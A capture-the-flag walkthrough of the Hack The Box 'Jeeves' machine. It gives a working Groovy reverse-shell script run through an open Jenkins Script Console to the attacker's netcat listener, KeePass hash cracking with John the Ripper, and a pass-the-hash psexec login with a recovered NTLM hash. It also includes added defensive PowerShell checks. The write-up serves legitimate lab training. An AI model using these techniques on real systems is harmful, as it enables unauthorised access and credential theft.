Hack The Box – Jeeves

Enumeration

As a first port of call for all machines, we’re going to enumerate by scanning open ports.

NMap Scan

$ nmap -T4 -A -v 10.10.10.63

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-15 20:47 BST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Initiating Ping Scan at 20:47
Scanning 10.10.10.63 [4 ports]
Completed Ping Scan at 20:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:47
Completed Parallel DNS resolution of 1 host. at 20:47, 0.02s elapsed
Initiating SYN Stealth Scan at 20:47
Scanning 10.10.10.63 [1000 ports]
Discovered open port 445/tcp on 10.10.10.63
Discovered open port 135/tcp on 10.10.10.63
Discovered open port 80/tcp on 10.10.10.63
Discovered open port 50000/tcp on 10.10.10.63
Completed SYN Stealth Scan at 20:47, 4.45s elapsed (1000 total ports)
Initiating Service scan at 20:47
Scanning 4 services on 10.10.10.63
Completed Service scan at 20:48, 6.42s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.63
Retrying OS detection (try #2) against 10.10.10.63
Initiating Traceroute at 20:48
Completed Traceroute at 20:48, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:48
Completed Parallel DNS resolution of 2 hosts. at 20:48, 0.04s elapsed
NSE: Script scanning 10.10.10.63.
Initiating NSE at 20:48
Completed NSE at 20:48, 40.06s elapsed
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Nmap scan report for 10.10.10.63
Host is up (0.039s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.909 days (since Sun May 13 23:00:10 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m20s, deviation: 0s, median: 4h59m20s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-16 01:47:34
|_  start_date: 2018-05-14 03:59:52

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   40.03 ms 10.10.14.1
2   40.00 ms 10.10.10.63

NSE: Script Post-scanning.
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.05 seconds
           Raw packets sent: 2086 (95.468KB) | Rcvd: 35 (2.228KB)

We can see that the machine is running Windows of some sort. We can also see a few open ports: 80, 135, 445 and 50000.

Exploring Port 80

We know that port 80 is usually used for web servers and in the above scan we can see that the service running on that port is Microsoft IIS.

If we put the IP into our browser we’re presented with a website.

It looks like a simple clone of a good old search engine. If we enter something into the box we’re presented with an error.

This error claims the server is running Microsoft SQL Server 2005, but if you inspect the page you’ll see that the error is just an image. Maybe it’s a decoy?

Dirbuster: Port 80

Let’s see what dirbuster can find for us on port 80. We’ll use the directory-list-1.0.txt wordlist.

Nothing there really. Maybe we can do a more intense scan and find something else but there are other ports to explore, so let’s move on for now.

Exploring Port 50000

Port 50000 is running a web server. Let’s have a look.

Ok so we got a 404 on this page. Let’s see what dirbuster can find for us.

Dirbuster: Port 50000

We’ll use the same wordlist that we used for port 80.

After a short time, we can see an interesting folder: askjeeves.

Exploitation

So let’s stop the scan for now and head over there and we can see a Jenkins instance. By the looks of it, it’s completely open.
After a short time browsing around we can find a Script Console under Manage Jenkins.
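Before running anything in it, it is worth knowing how to tell whether a Jenkins instance is open like this one. The following PowerShell function is an added example, not code from the original writeup: it requests the Script Console page anonymously and reports whether it came back, which is the finding the writeup relies on. The base URL is an assumption taken from the path discovered above, and the "Script Console" page title and X-Jenkins header are standard Jenkins behaviour.

```powershell
# Added example, not part of the original writeup: check whether a Jenkins
# instance lets an anonymous visitor reach the Script Console. The base URL
# passed at the bottom is an assumption taken from the writeup's path.
function Test-JenkinsScriptConsoleExposure {
    param(
        [Parameter(Mandatory)][string]$BaseUrl,
        [int]$TimeoutSec = 10
    )

    $url     = $BaseUrl.TrimEnd('/') + '/script'
    $status  = $null
    $body    = ''
    $headers = @{}

    try {
        $resp    = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec $TimeoutSec
        $status  = [int]$resp.StatusCode
        $body    = [string]$resp.Content
        $headers = $resp.Headers
    }
    catch {
        # Windows PowerShell 5.1 and PowerShell 7 both throw on 4xx/5xx; the
        # response object, when present, still carries the status code.
        if ($_.Exception.Response) {
            $status = [int]$_.Exception.Response.StatusCode
        }
        else {
            throw
        }
    }

    # Jenkins advertises itself with an X-Jenkins header. A secured instance
    # answers 403 to an anonymous request for /script, or redirects to /login,
    # and neither of those pages carries the "Script Console" title.
    $isJenkins = [bool]($headers.Keys | Where-Object { $_ -ieq 'X-Jenkins' })
    $exposed   = ($status -eq 200) -and ($body -match 'Script Console')

    $verdict = if ($exposed) {
        'Anonymous users can run Groovy as the Jenkins service account: enable a security realm and authorization strategy, and restrict the Script Console to administrators.'
    }
    elseif ($status -eq 403) {
        'Script Console requires authentication.'
    }
    else {
        'Inconclusive; inspect the response manually.'
    }

    [pscustomobject]@{
        Url       = $url
        Status    = $status
        IsJenkins = $isJenkins
        Exposed   = $exposed
        Verdict   = $verdict
    }
}

# Assumed URL, taken from the folder found with dirbuster above.
Test-JenkinsScriptConsoleExposure -BaseUrl 'http://10.10.10.63:50000/askjeeves' | Format-List
```

Because the Script Console executes Groovy with the privileges of the Jenkins process (here, as the shell prompt later shows, the Administrator account), an Exposed = True result is equivalent to an unauthenticated administrator login and should be treated as such.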

As per the description, this script console accepts Groovy scripts. The script below is available on frohoff’s GitHub, so either grab it there or use the code below.

String host = "localhost";   // set to the IP of your attacking machine (see below)
int port = 8044;             // must match the port your listener is on
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Set up a listening port on your attacking machine. I used Netcat for this:
nc -lvp 8044

Set the host variable in the script to the IP of your attacking machine and set the port to the one you’re listening on. Run the script and BOOM, we have a reverse shell.

$ nc -lvp 8044
listening on [any] 8044 ...
10.10.10.63: inverse host lookup failed: Unknown host
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.63] 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>

Have a look around the directories that you’re able to. The first flag (user.txt) can be found in C:\Users\kohsuke\Desktop. Use type to display the flag.

Now it’s time to get the root flag.

Root Enumeration

Head into kohsuke’s Documents directory and you’ll find an interesting file: CEH.kdbx is a KeePass database file. KeePass is a password manager, so this will likely contain something interesting.

We’re going to use John the Ripper to crack the master password of the file, which means you’ll need a local copy of this file.

There are a couple of ways to do this. One is to use Netcat to set up a listener on the Jeeves box and then connect to it from your attacking machine, but I think I have an issue on my system that’s stopping incoming connections, so the easiest way I found was to copy the file to the userContent folder inside the Jenkins directory (C:\Users\Administrator\.jenkins\userContent). Files placed in this directory are served up by the web server and available to GET requests, i.e. http://10.10.10.63:50000/askjeeves/userContent/CEH.kdbx

John the Ripper

Now that you have the kdbx file, we need to get a password hash. Use keepass2john to do this:
keepass2john CEH.kdbx > hash

Then we can use the rockyou wordlist with JtR to crack the hash file we just wrote (the option is --wordlist, and john takes the hash file, not the kdbx, as its argument):
john --wordlist=rockyou.txt hash

After a short time you should be given a password match by JtR.
I installed KeePass at this point and opened CEH.kdbx, then entered the master password that was provided by JtR.

There are a few interesting entries in the DB, but the one we’re after is Backup stuff. View the password and you’ll actually find an NTLM hash. This hash can be used directly to authenticate to an SMB service (a pass-the-hash login, with no need to crack it), and if you look at the original NMap findings, there was an SMB service available to us.

Exploitation

Open up metasploit and load up the smb exploit.
use exploit/windows/smb/psexec

Set the RHOST option to the IP of the box. Set the SMBPass option to the NTLM hash from KeePass and lastly set the SMBUser option to Administrator, as that’s who we want to authenticate as. Run exploit and you should get a Meterpreter session. From here we can drop straight into a command prompt as Administrator by typing shell.

The user.txt file was located on the Desktop of the kohsuke user, so let’s look at the Desktop of the Administrator first.

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,525,425,152 bytes free

There’s a file called hm.txt but no root.txt, and if you have a look at the contents it tells us to look deeper…

C:\Users\Administrator\Desktop>type hm.txt
The flag is elsewhere.  Look deeper.

Use the /r argument with dir to list the Desktop along with its alternate data streams and you’ll discover a hidden stream:

C:\Users\Administrator\Desktop>dir /r
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,525,425,152 bytes free

This is an Alternate Data Stream: root.txt is a second NTFS data stream attached to hm.txt, so it doesn’t show up in a normal directory listing (a good explanation can be found on the How to Geek website). To see the contents we’ll have to use something that will accept the data stream as input, such as more.

The following redirects the contents of the data stream into the more program, which then displays that content.

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
<ROOT FLAG>

You should now have your root flag!
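The cmd.exe redirection trick above works once you already know the stream name. As an added example that is not part of the original writeup, the PowerShell function below enumerates every alternate data stream under a directory, which is how a defender would find content hidden this way without knowing where to look. It assumes Windows PowerShell 3.0 or later on an NTFS volume; the Desktop path used at the bottom is taken from the writeup and is an assumption about where you run it.

```powershell
# Added example, not part of the original writeup: enumerate alternate data
# streams under a directory so that content hidden the way root.txt was
# (attached to hm.txt) shows up. Assumes Windows PowerShell 3.0+ on NTFS.
function Find-AlternateDataStreams {
    param(
        [Parameter(Mandatory)][string]$Root,
        # Zone.Identifier is the browser "mark of the web" and is normally
        # benign, so it is hidden unless explicitly requested.
        [switch]$IncludeZoneIdentifier
    )

    Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # Every file has the unnamed ':$DATA' stream; any other stream is an ADS.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Where-Object { $IncludeZoneIdentifier -or ($_.Stream -ne 'Zone.Identifier') } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                    }
                }
        }
}

# On the writeup's box this lists hm.txt with a 34-byte stream named root.txt.
# The path is an assumption; point it at whatever directory you are reviewing.
Find-AlternateDataStreams -Root 'C:\Users\Administrator\Desktop' | Format-Table -AutoSize

# Read a flagged stream without the cmd.exe redirection trick:
#   Get-Content -LiteralPath 'C:\Users\Administrator\Desktop\hm.txt' -Stream 'root.txt'
```

Running it with -IncludeZoneIdentifier over a user profile is a quick way to see how common the benign stream is, which is why the default filters it out; anything else that appears, especially on an administrator’s Desktop, deserves a look.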